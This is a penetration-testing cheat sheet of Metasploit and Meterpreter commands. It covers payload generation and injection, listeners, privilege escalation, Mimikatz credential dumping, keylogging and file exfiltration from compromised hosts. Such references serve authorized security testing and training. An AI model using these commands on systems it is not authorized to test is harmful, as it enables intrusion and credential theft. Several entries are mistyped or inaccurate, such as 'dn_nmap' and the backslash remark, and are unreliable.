Metasploit References

General

• Start Without Banner: sudo msfconsole -q

• Start With Setup Script: sudo msfconsole -r <setup_script>.rc

• Help and Show Parameters: show -h

• Return to Prompt: back

• Return to Previous Module: previous

• Activate Module: use <module_name>

• Set/Remove Global Options: setg or unsetg

• Display Discovered Hosts: hosts

• Execute Nmap: dn_nmap <host> <flag> <flag>

• Search Modules: search type:<module_type> name:<module_name>

  • search type:auxiliary name:smb

• Generate msfvenom Payload: generate -f <format> -x <file_to_inject> -o <new_output_file>

• Background Current Session: background

• List Available Sessions: sessions -l

• Foreground Specified Session: sessions -i <#>

• View Running Background Jobs: jobs

• Foreground Background Job: job -i <#>

• Display Advanced Options: show advanced

• Encode Second Stage of Staged Payload: set EnableStageEncoding true

• Specify Encoder: set StageEncoder <option>

• Configure Auto Run on Connection: set AutoRunScript <script_to_run>

• List Available Transports: transport list

• Add New Transport Protocol to Current Session: transport add -t <transport_protocol_to_add> -l <local_IP_address> -p

  • Initialize Multi Handler for New Transport Request: use multi/handler

    • Set new Transport Protocol (Payload Directory): set payload <transport_protocol_equivalent>

  • Change Newly-Created Transport Mode: transport next

Workspaces

• List Available Workspaces: workspace

• Change Workspace: workspace <workspace_name>

• Add Workspace: workspace -a <workspace_name>

• Delete Workspace: workspace -d <workspace_name>

Database Queries

• Display Scan Results: services

• Filter Previous Scan Results: services -<flag> <search_criteria>

  • Show Hosts w/Specified Port: services -p <port>

  • Show Services Options: services -h

• Retrieve Success Logon Attempts/Credentials: creds

Modules

• Invoke/Activate Module: use <module_name>

• Get Information on Invoked Module: info

• Display Required/Optional Options: show options

• Search Database and Add Results to Option: services -<flag> <search_criteria> --<option_to_populate>

  • services -p 445 --rhosts

• Set/Remove Module Options: set or unset

• Run Module: run

• List Auxiliary Modules: show auxiliary

  • Structured as module type/os, vendor, app, or protocol/module name

• Search Exploit Modules: search type:exploit <search>

• Request Information on Module: info <path_to_module>

• Use Exploit: use <exploit/…>

• Show Available Payloads: show payloads

• Set Payloads: set payload <path_to_payload>

• Show Exploit/Payload Options: show options

• Check/Verify if Target is Vulnerable (Requires Banner/Identifiable Data): check

• Load Extensions in Active Session: load <extension>

  • Powershell Extension: load powershell

  • Mimikatz: load kiwi

    • Get System Privileges: getsystem

    • Dump Credentials: creds_msy

Meterpreter Payloads

• Search Meterpreter Payloads: search meterpreter type:payload

• Show Available Meterpreter Commands: help

• Get System Information: sysinfo

• Get User Information: getuid

• Upload File: upload <local_file_path> <target_file_path>

• Download File: download <target_file_path> <local_file_path>

• Get System Shell: shell

• Take Screenshot: screenshot

• Start Keylogger: keyscan_start

  • Requires migrating shell process to the targeted user context

  • Dump Keylogger Results: keyscan_dump

  • Stop Keylogger: keyscan_stop

• Migrate Process: migrate <ps_ID>

• View Running Processes: ps

Exploit Multi-Handlers

• Initialize Multi Handler: use multi/handler

• Set Payload Used/To Be Expected: set payload <payload>

  • Staged payloads are denoted by a backslash (e.g. shell/reverse_tcp)

• Show Options: show options

• Initialize Multi Handler Listener: exploit

• Initialize in Background: exploit -j